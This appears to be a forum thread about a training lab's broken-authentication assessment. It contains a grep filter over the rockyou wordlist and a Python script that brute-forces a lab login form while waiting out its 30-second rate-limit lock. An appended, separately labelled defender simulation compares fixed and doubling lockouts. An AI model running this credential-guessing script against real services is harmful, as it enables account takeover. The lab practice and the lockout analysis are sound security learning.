Skill Assessment - Broken Authentication

Hi guys, I’m having extreme difficulty completing the skill assessment. I’ll mention what I’ve already done.

  • Discovered 10 users, being support.XX and admin.XX
  • I performed a filter with rockyou’s password policies with the following command:
grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep '[[:punct:]]' | grep -E '^.{20,}$'

I adapted rate_limit_check_py to see if I could get a valid password for a user, but so far nothing. I’ve already tried brute force via ffuf, wfuzz, hydra. I’ve been stuck on this for a long time, could anyone help me? I’ll leave the adapted script below:


import time

import requests

# files that contain the candidate passwords and the user names
userpass_file = "wordlistsecond.txt"
userlist_file = "userlist.txt"

# login endpoint; user and password are sent as POST fields
url = "http://94.237.62.195:40807/login.php"

# rate limit blocks for 30 seconds
lock_time = 31

# message that alerts us we hit the rate limit
lock_message = "Too many failures"

# read user and password
while True:
    with open(userpass_file, "r") as fp:
        for plinha in fp:
            if plinha.startswith("#"):
                continue
            # drop the trailing newline so it is not sent as part of the value
            plinha = plinha.rstrip("\n")

            with open(userlist_file, "r") as fu:
                for ulinha in fu:
                    ulinha = ulinha.rstrip("\n")
                    data = {
                        "userid": ulinha,
                        "passwd": plinha,
                        "submit": "submit",
                        "remember": "remember"
                        }
                    res = requests.post(url, data=data)

                    if "Invalid credentials" in res.text:
                        print("[-] Invalid credentials: userid:{} passwd:{}".format(ulinha, plinha))
                    elif "Messages" in res.text:
                        print("[++++++++++++++++++++] Valid credentials: userid:{} passwd:{}".format(ulinha, plinha))
                    elif lock_message in res.text:
                        print("[-] Hit rate limit, sleeping {}s".format(lock_time))
                        time.sleep(lock_time)

I literally just need to resolve this to end the bug bounty path

I resolved it: the regex is wrong, so all the passwords filtered by it are wrong too. If someone needs help to resolve this module, feel free to send me a private message.
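
An added example, not part of the thread: a defender-side simulation of the 30-second lock mentioned in the first post, using a simulated clock and no network traffic. It counts how many password checks a client that waits out every lock still gets in one hour under a fixed lock and under a doubling one; the failure threshold of 5, the doubling policy with its one-hour cap, and the one-second request time are assumptions.

```python
# Added example: simulated clock only, nothing is sent anywhere.
LOCK_SECONDS = 30   # lock duration stated in the post
MAX_FAILURES = 5    # assumed threshold; the post does not give one


class LoginThrottle:
    """Per-source failure counter with an optional escalating lockout."""

    def __init__(self, escalate, cap=3600):
        self.escalate = escalate      # False: fixed lock, True: doubling lock
        self.cap = cap                # assumed upper bound for one lock
        self.failures = 0
        self.lockouts = 0
        self.locked_until = 0.0

    def current_lock(self):
        if not self.escalate:
            return LOCK_SECONDS
        return min(LOCK_SECONDS * 2 ** (self.lockouts - 1), self.cap)

    def failed_login(self, now):
        """Record one failed attempt; return False if rejected as locked."""
        if now < self.locked_until:
            return False
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.failures = 0
            self.lockouts += 1
            self.locked_until = now + self.current_lock()
        return True


def guesses_evaluated(throttle, duration=3600, request_time=1.0):
    """Count password checks granted to a client that waits out every lock."""
    now, evaluated = 0.0, 0
    while now < duration:
        if throttle.failed_login(now):
            evaluated += 1
            now += request_time
        else:
            now = throttle.locked_until   # client sleeps until the lock ends
    return evaluated


if __name__ == "__main__":
    print("fixed 30 s lock:", guesses_evaluated(LoginThrottle(escalate=False)))
    print("doubling lock:  ", guesses_evaluated(LoginThrottle(escalate=True)))
```

Under these assumptions the fixed lock still lets 530 failed guesses through per hour, while the doubling lock allows 35.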